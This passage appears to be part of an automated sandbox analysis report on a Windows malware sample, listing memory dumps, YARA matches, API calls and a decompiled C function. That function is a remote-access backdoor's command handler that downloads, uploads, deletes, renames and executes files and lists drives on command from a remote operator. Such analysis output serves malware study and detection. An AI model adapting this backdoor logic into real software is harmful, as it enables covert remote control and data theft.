                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                                          • Instruction ID: 52561c361bf01b8e86e1a5ce9e630969f3828b93d2dbd7bb4aa450e57b23c49a
                                          • Opcode Fuzzy Hash: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                                          • Instruction Fuzzy Hash: A3F01D7690030CBFDF10AFA09C05FEEBBBCEB04B52F1041A5FA04E6195D2759B549B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE(?,00000001), ref: 00416EE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 0043F9FB
                                            • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          • RtlReAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000001,?,0040F572,?,?,?,0040F89B), ref: 0043FA37
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap$_free
                                          • String ID:
                                          • API String ID: 1482568997-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Window$ForegroundText
                                          • String ID:
                                          • API String ID: 29597999-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004186DA
                                            • Part of subcall function 00402728: std::_Deallocate.LIBCONCRT ref: 00402B22
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeallocateH_prologstd::_
                                          • String ID:
                                          • API String ID: 3881773970-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00422251: recv.WS2_32(?,?,?,?), ref: 0042225C
                                          • WSAGetLastError.WS2_32 ref: 0042219B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastrecv
                                          • String ID:
                                          • API String ID: 2514157807-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042226A: send.WS2_32(?,?,?,?), ref: 00422275
                                          • WSAGetLastError.WS2_32 ref: 0042220C
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastsend
                                          • String ID:
                                          • API String ID: 1802528911-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • socket.WS2_32(00000000,00000001,00000006), ref: 004049AC
                                            • Part of subcall function 004049DE: WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Startupsocket
                                          • String ID:
                                          • API String ID: 3996037109-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • recv.WS2_32(FFFFFFFF,0046BACC,?,00000000), ref: 00404B82
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
                                          • API String ID: 724789610-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • std::_Deallocate.LIBCONCRT ref: 00402E92
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Deallocatestd::_
                                          • String ID:
                                          • API String ID: 1323251999-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C02
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C0E
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C19
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C24
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C2F
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C3A
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C45
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C50
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C5B
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C69
                                          • _free.LIBCMT ref: 00441BE3
                                            • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                            • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: closesocket
                                          • String ID:
                                          • API String ID: 2781271927-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 81%
                                          			E0040697D(short* __edx, void* __eflags, intOrPtr _a4) {
                                          				char _v108;
                                          				void* _v112;
                                          				char _v132;
                                          				char _v136;
                                          				char _v140;
                                          				char _v152;
                                          				char _v156;
                                          				char _v160;
                                          				void* _v176;
                                          				char _v180;
                                          				char _v192;
                                          				void* _v204;
                                          				char _v208;
                                          				char _v212;
                                          				char _v216;
                                          				void* _v224;
                                          				char _v228;
                                          				char _v232;
                                          				char _v236;
                                          				char _v240;
                                          				char _v244;
                                          				void* _v248;
                                          				char _v252;
                                          				char _v256;
                                          				char _v260;
                                          				char _v264;
                                          				char _v268;
                                          				char _v272;
                                          				char _v276;
                                          				char _v280;
                                          				char _v284;
                                          				char _v288;
                                          				char _v292;
                                          				char _v296;
                                          				void* _v300;
                                          				void* _v308;
                                          				void* _v312;
                                          				char _v324;
                                          				char _v336;
                                          				char _v344;
                                          				char _v348;
                                          				char _v368;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed char _t160;
                                          				signed int _t162;
                                          				void* _t166;
                                          				void* _t171;
                                          				signed int _t172;
                                          				void* _t187;
                                          				void* _t202;
                                          				signed int _t204;
                                          				void* _t218;
                                          				int _t228;
                                          				void* _t235;
                                          				void* _t236;
                                          				void* _t249;
                                          				void* _t256;
                                          				signed int _t261;
                                          				void* _t265;
                                          				void* _t277;
                                          				short* _t288;
                                          				void* _t289;
                                          				void* _t300;
                                          				void* _t316;
                                          				void* _t326;
                                          				void* _t332;
                                          				void* _t334;
                                          				void* _t336;
                                          				void* _t340;
                                          				void* _t344;
                                          				void* _t354;
                                          				void* _t356;
                                          				void* _t377;
                                          				void* _t380;
                                          				void* _t542;
                                          				void* _t569;
                                          				intOrPtr _t574;
                                          				intOrPtr _t575;
                                          				signed int _t576;
                                          				signed int _t578;
                                          				signed int _t581;
                                          				void* _t588;
                                          				void* _t590;
                                          				void* _t592;
                                          				void* _t594;
                                          				void* _t596;
                                          				signed int _t597;
                                          				void* _t600;
                                          				void* _t601;
                                          				void* _t602;
                                          				void* _t603;
                                          				void* _t604;
                                          				void* _t605;
                                          				void* _t606;
                                          				void* _t609;
                                          				void* _t614;
                                          				void* _t615;
                                          				void* _t616;
                                          				void* _t618;
                                          				void* _t620;
                                          				void* _t639;
                                          				void* _t640;
                                          				void* _t641;
                                          				void* _t642;
                                          				void* _t645;
                                          				void* _t647;
                                          
                                          				_t646 = __eflags;
                                          				_t550 = __edx;
                                          				_push(_t356);
                                          				_t574 = _a4;
                                          				_push(_t569);
                                          				E004020EC(_t356,  &_v156, __edx, __eflags, _t574 + 0x1c);
                                          				SetEvent( *(_t574 + 0x34));
                                          				_t575 =  *((intOrPtr*)(L00401F95( &_v160)));
                                          				E004042A6( &_v160,  &_v136, 4, 0xffffffff);
                                          				_t600 = (_t597 & 0xfffffff8) - 0xec;
                                          				E004020EC(0x46c238, _t600, _t550, _t646, 0x46c238);
                                          				_t601 = _t600 - 0x18;
                                          				E004020EC(0x46c238, _t601, _t550, _t646,  &_v152);
                                          				E00417478( &_v288, _t550);
                                          				_t602 = _t601 + 0x30;
                                          				_t647 = _t575 - 0x8b;
                                          				if(_t647 > 0) {
                                          					_t576 = _t575 - 0x8c;
                                          					__eflags = _t576;
                                          					if(__eflags == 0) {
                                          						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                                          						_t160 = GetFileAttributesW(L00401EEB( &_v260));
                                          						__eflags = _t160 & 0x00000010;
                                          						if((_t160 & 0x00000010) == 0) {
                                          							_t162 = DeleteFileW(L00401EEB( &_v260));
                                          						} else {
                                          							_t162 = E00417754(L00401EEB( &_v260));
                                          						}
                                          						__eflags = _t162;
                                          						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
                                          						if(__eflags == 0) {
                                          							_t603 = _t602 - 0x18;
                                          							E0041739C(0x46c238, _t603,  &_v252);
                                          							_push(0x55);
                                          							E00404AA4(0x46c238, 0x46c2e8,  &_v252, __eflags);
                                          							_t166 = E0041733B( &_v208,  &_v280);
                                          							_t604 = _t603 - 0x18;
                                          							_t553 = "Unable to delete: ";
                                          							E004075C2(0x46c238, _t604, "Unable to delete: ", _t569, __eflags, _t166);
                                          							_t605 = _t604 - 0x14;
                                          							_t377 = _t605;
                                          							_push("[ERROR]");
                                          						} else {
                                          							_t187 = E0041733B( &_v180,  &_v252);
                                          							_t609 = _t602 - 0x18;
                                          							_t553 = "Deleted file: ";
                                          							E004075C2(0x46c238, _t609, "Deleted file: ", _t569, __eflags, _t187);
                                          							_t605 = _t609 - 0x14;
                                          							_t377 = _t605;
                                          							_push("[Info]");
                                          						}
                                          						E00402084(0x46c238, _t377);
                                          						L00416C80(0x46c238, _t569);
                                          						_t606 = _t605 + 0x30;
                                          						E00401FC7();
                                          						_t171 = L00401E49( &_v288, _t553, __eflags, 1);
                                          						_t550 = "1";
                                          						_t380 = _t171;
                                          						_t172 = L00405A6F("1");
                                          						__eflags = _t172;
                                          						if(_t172 == 0) {
                                          							L40:
                                          							L00401EF0();
                                          							L41:
                                          							L00401E74( &_v284, _t550);
                                          							E00401FC7();
                                          							E00401FC7();
                                          							return 0;
                                          						} else {
                                          							__eflags = E00407323( &_v272, _t380, _t380) + 1;
                                          							E0040733F(E00407323( &_v272, _t380, _t380) + 1);
                                          							_t550 =  &_v284;
                                          							L00401EFA( &_v284,  &_v284, _t576, L00402FFA(0x46c238,  &_v212,  &_v284, 0x2a));
                                          							L00401EF0();
                                          							E0040427F(0x46c238, _t606 - 0x18, L00401EEB( &_v288));
                                          							L39:
                                          							E004061C3();
                                          							goto L40;
                                          						}
                                          					}
                                          					_t578 = _t576 - 1;
                                          					__eflags = _t578;
                                          					if(__eflags == 0) {
                                          						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                                          						E0040427F(0x46c238,  &_v216, L00401F95(L00401E49( &_v272, _t550, __eflags, 1)));
                                          						E00407309( &_v276,  &_v252, 0, E00407323( &_v268,  &_v216,  &_v216) + 1);
                                          						_t202 = L00401EEB(E00407629( &_v216,  &_v264,  &_v240));
                                          						_t204 = E00439924(L00401EEB( &_v288), _t202);
                                          						asm("sbb bl, bl");
                                          						L00401EF0();
                                          						_t361 =  ~_t204 + 1;
                                          						__eflags =  ~_t204 + 1;
                                          						if(__eflags == 0) {
                                          							_t550 = E004075E6( &_v180, "Unable to rename file!", __eflags, 0x46c238);
                                          							E00405343(_t361, _t602 - 0x18, _t206, _t569, __eflags, "16");
                                          							_push(0x59);
                                          							E00404AA4(_t361, 0x46c2e8, _t206, __eflags);
                                          							E00401FC7();
                                          						} else {
                                          							_t550 =  &_v228;
                                          							E00407514(_t602 - 0x18,  &_v228, __eflags, "*");
                                          							E004061C3();
                                          						}
                                          						L00401EF0();
                                          						L13:
                                          						L00401EF0();
                                          						goto L40;
                                          					}
                                          					_t581 = _t578 - 1;
                                          					__eflags = _t581;
                                          					if(__eflags == 0) {
                                          						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                                          						_t218 = L00401F95(L00401E49( &_v272, _t550, __eflags, 1));
                                          						_t550 =  &_v264;
                                          						CreateDirectoryW(L00401EEB(E00407514( &_v192,  &_v264, __eflags, _t218)), 0);
                                          						L00401EF0();
                                          						E00403300(0x2a);
                                          						E00407350(0x46c238, _t602 - 0x18,  &_v264, __eflags,  &_v268);
                                          						goto L39;
                                          					}
                                          					_t583 = _t581 - 3;
                                          					__eflags = _t581 - 3;
                                          					if(__eflags == 0) {
                                          						_t228 = StrToIntA(L00401F95(L00401E49( &_v264, _t550, __eflags, _t583)));
                                          						_t550 = L00401F95(L00401E49( &_v268, _t550, __eflags, 1));
                                          						L00417F10(_t228, _t230);
                                          					}
                                          					goto L41;
                                          				}
                                          				if(_t647 == 0) {
                                          					E004020D5(0x46c238,  &_v180);
                                          					E0040484E(0x46c238,  &_v108, 1);
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					E00404A08(_t550);
                                          					_t235 = L00401E49( &_v284, _t550, __eflags, 3);
                                          					_t614 = _t602 - 0xfffffffffffffff8;
                                          					_t236 = L00401E49( &_v288, _t550, __eflags, 2);
                                          					L00402F93(0x46c238, _t614, L00402F93(0x46c238,  &_v236, L00402F93(0x46c238,  &_v260, L00402FB7( &_v284, L00401E49( &_v292, _t550, __eflags, 1), 0x46c238), __eflags, _t236), __eflags, 0x46c238), __eflags, _t235);
                                          					E00404AA4(0x46c238,  &_v140, _t240, __eflags);
                                          					E00401FC7();
                                          					E00401FC7();
                                          					E00401FC7();
                                          					E0040427F(0x46c238,  &_v292, L00401F95(L00401E49( &_v324, _t240, __eflags, 0)));
                                          					_t249 = E0041733B( &_v272,  &_v296);
                                          					_t615 = _t614 - 0x18;
                                          					E004075C2(0x46c238, _t615, "Downloading file: ", _t602 - 0x10, __eflags, _t249);
                                          					_t616 = _t615 - 0x14;
                                          					E00402084(0x46c238, _t616, "[Info]");
                                          					L00416C80(0x46c238, "[Info]");
                                          					E00401FC7();
                                          					L00401EF0();
                                          					_t256 = L00401F95(L00401E49( &_v336, "Downloading file: ", __eflags, 0));
                                          					_t618 = _t616 + 0x30 - 0x18;
                                          					E0040427F(0x46c238, _t618, _t256);
                                          					_t261 = E004062D8( &_v192, __eflags, E004398A0(_t258, L00401F95(L00401E49( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
                                          					_t620 = _t618 + 0x2c;
                                          					_push(0);
                                          					__eflags = _t261;
                                          					if(__eflags == 0) {
                                          						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
                                          						_t265 = E0041733B( &_v244,  &_v268);
                                          						_t550 = "Failed to download file: ";
                                          						E004075C2(0x46c238, _t620 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t265);
                                          						E00402084(0x46c238, _t620 - 4, "[ERROR]");
                                          						L00416C80(0x46c238, "[Info]");
                                          						E00401FC7();
                                          						L00401EF0();
                                          					} else {
                                          						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
                                          						_t277 = E0041733B( &_v244,  &_v268);
                                          						_t550 = "Downloaded file: ";
                                          						E004075C2(0x46c238, _t620 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t277);
                                          						E00402084(0x46c238, _t620 - 4, "[Info]");
                                          						L00416C80(0x46c238, "[Info]");
                                          						E00401FC7();
                                          						L00401EF0();
                                          						E00402084(0x46c238, _t620 - 4 + 0x30 - 0x18, 0x45f6bc);
                                          						_push(0x58);
                                          						E00404AA4(0x46c238,  &_v156, "Downloaded file: ", __eflags);
                                          					}
                                          					E00404E0B( &_v140);
                                          					L00404E2F(0x46c238,  &_v140, 0);
                                          					L15:
                                          					E00401FC7();
                                          					goto L41;
                                          				}
                                          				_t588 = _t575 - 0x61;
                                          				if(_t588 == 0) {
                                          					E0040427F(0x46c238, _t602 - 0x18, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                                          					_t288 = L00401E49( &_v272, _t550, __eflags, 2);
                                          					_t289 = L00401E49( &_v276, _t550, __eflags, 1);
                                          					_t550 = _t288;
                                          					E004169CC(_t289, _t288);
                                          					goto L41;
                                          				}
                                          				_t590 = _t588 - 0x26;
                                          				if(_t590 == 0) {
                                          					GetLogicalDriveStringsA(0x64,  &_v108);
                                          					E004020AB(0x46c238,  &_v252, _t550, __eflags,  &_v108, 0x64);
                                          					__eflags = E00407397( &_v260, 0x45f860, 0, 2) + 1;
                                          					L00401F84(E00407397( &_v260, 0x45f860, 0, 2) + 1);
                                          					E004020EC(0x46c238, _t602 - 0x18, _t550, E00407397( &_v260, 0x45f860, 0, 2) + 1,  &_v276);
                                          					_t300 = E00406406(0x46c238,  &_v256);
                                          					_t550 = L00402FB7( &_v232,  &_v280, 0x46c238);
                                          					L00402F1D(_t602 - 0x18, _t301, _t300);
                                          					_push(0x51);
                                          					E00404AA4(0x46c238, 0x46c2e8, _t301, __eflags);
                                          					E00401FC7();
                                          					E00401FC7();
                                          					goto L15;
                                          				}
                                          				_t592 = _t590 - 1;
                                          				if(_t592 == 0) {
                                          					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                                          					E00407350(0x46c238, _t602 - 0x18, _t550, __eflags,  &_v260);
                                          					E004061C3();
                                          					__eflags = E00402489() - 2;
                                          					_t316 = E0041733B( &_v228, E00407309( &_v264,  &_v240, 0, E00402489() - 2));
                                          					_t550 = "Browsing directory: ";
                                          					E004075C2(0x46c238, _t602 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t569, E00402489() - 2, _t316);
                                          					E00402084(0x46c238, _t602 - 0x18 + 0x18 - 4, "[Info]");
                                          					L00416C80(0x46c238, _t569);
                                          					E00401FC7();
                                          					goto L13;
                                          				}
                                          				_t594 = _t592 - 1;
                                          				if(_t594 == 0) {
                                          					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
                                          					ShellExecuteW(0, L"open", L00401EEB( &_v260), 0, 0, 1);
                                          					_t326 = E0041733B( &_v212,  &_v260);
                                          					_t550 = "Executing file: ";
                                          					E004075C2(0x46c238, _t602 - 0x18, "Executing file: ", _t569, __eflags, _t326);
                                          					E00402084(0x46c238, _t602 - 4, "[Info]");
                                          					L00416C80(0x46c238, _t569);
                                          					E00401FC7();
                                          					goto L40;
                                          				} else {
                                          					_t596 = _t594 - 1;
                                          					_t652 = _t596;
                                          					if(_t596 == 0) {
                                          						E004072F6( &_v108);
                                          						_t332 = L00401E49( &_v264, _t550, _t652, 3);
                                          						_t639 = _t602 - 0x18;
                                          						E004020EC(0x46c238, _t639, _t550, _t652, _t332);
                                          						_t334 = L00401E49( &_v272, _t550, _t652, 2);
                                          						_t640 = _t639 - 0x18;
                                          						E004020EC(0x46c238, _t640, _t550, _t652, _t334);
                                          						_t336 = L00401E49( &_v280, _t550, _t652, 1);
                                          						_t641 = _t640 - 0x18;
                                          						E004020EC(0x46c238, _t641, _t550, _t652, _t336);
                                          						_push(L00401F95(L00401E49( &_v288, _t550, _t652, _t596)));
                                          						_t340 = E004064A2( &_v136, _t550);
                                          						_push(_t596);
                                          						_t653 = _t340;
                                          						if(_t340 == 0) {
                                          							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, __eflags)));
                                          							_t344 = E0041733B( &_v232,  &_v256);
                                          							_t642 = _t641 - 0x18;
                                          							_t550 = "Failed to upload file: ";
                                          							E004075C2(0x46c238, _t642, "Failed to upload file: ", _t569, __eflags, _t344);
                                          							_t542 = _t642 - 0x14;
                                          							_push("[ERROR]");
                                          						} else {
                                          							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, _t653)));
                                          							_t354 = E0041733B( &_v232,  &_v256);
                                          							_t645 = _t641 - 0x18;
                                          							_t550 = "Uploaded file: ";
                                          							E004075C2(0x46c238, _t645, "Uploaded file: ", _t569, _t653, _t354);
                                          							_t542 = _t645 - 0x14;
                                          							_push("[Info]");
                                          						}
                                          						E00402084(0x46c238, _t542);
                                          						L00416C80(0x46c238, _t569);
                                          						E00401FC7();
                                          						L00401EF0();
                                          						L00407304(0x46c238,  &_v132, _t596);
                                          					}
                                          					goto L41;
                                          				}
                                          			}

                                          0x00406c4a
                                          0x00406c56
                                          0x00000000
                                          0x00406c5b
                                          0x00406a24
                                          0x00406a27
                                          0x00406b6f
                                          0x00406b88
                                          0x00406b96
                                          0x00406b9e
                                          0x00406ba6
                                          0x00406bb5
                                          0x00406bba
                                          0x00406bc6
                                          0x00000000
                                          0x00406a2d
                                          0x00406a2d
                                          0x00406a2d
                                          0x00406a30
                                          0x00406a3d
                                          0x00406a48
                                          0x00406a4d
                                          0x00406a53
                                          0x00406a5e
                                          0x00406a63
                                          0x00406a69
                                          0x00406a74
                                          0x00406a79
                                          0x00406a7f
                                          0x00406a95
                                          0x00406a9d
                                          0x00406aa6
                                          0x00406aa7
                                          0x00406aa9
                                          0x00406afb
                                          0x00406b08
                                          0x00406b0d
                                          0x00406b10
                                          0x00406b18
                                          0x00406b20
                                          0x00406b22
                                          0x00406aab
                                          0x00406abc
                                          0x00406ac9
                                          0x00406ace
                                          0x00406ad1
                                          0x00406ad9
                                          0x00406ae1
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406b27
                                          0x00406b2c
                                          0x00406b38
                                          0x00406b41
                                          0x00406b4d
                                          0x00406b4d
                                          0x00000000
                                          0x00406a30

                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 0040699F
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B88
                                            • Part of subcall function 004064A2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                                            • Part of subcall function 004062D8: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
                                            • Part of subcall function 004062D8: WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
                                            • Part of subcall function 004062D8: CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
                                            • Part of subcall function 004062D8: MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                            • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406C73
                                          • StrToIntA.SHLWAPI(00000000,?), ref: 00406FE2
                                          • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407051
                                            • Part of subcall function 004061C3: FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
                                          • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[ERROR]$[Info]$open
                                          • API String ID: 4189642951-1986272625
                                          • Opcode ID: 1f6703755000767a5f67cd65e7268118d2d2a33c34c8fd2d2e666a0488e9e463
                                          • Instruction ID: 2a12d23acd30ce868743ee3b5d09fdf4f29f8ef519bcce84dbcc6bced154e8ad
                                          • Opcode Fuzzy Hash: 1f6703755000767a5f67cd65e7268118d2d2a33c34c8fd2d2e666a0488e9e463
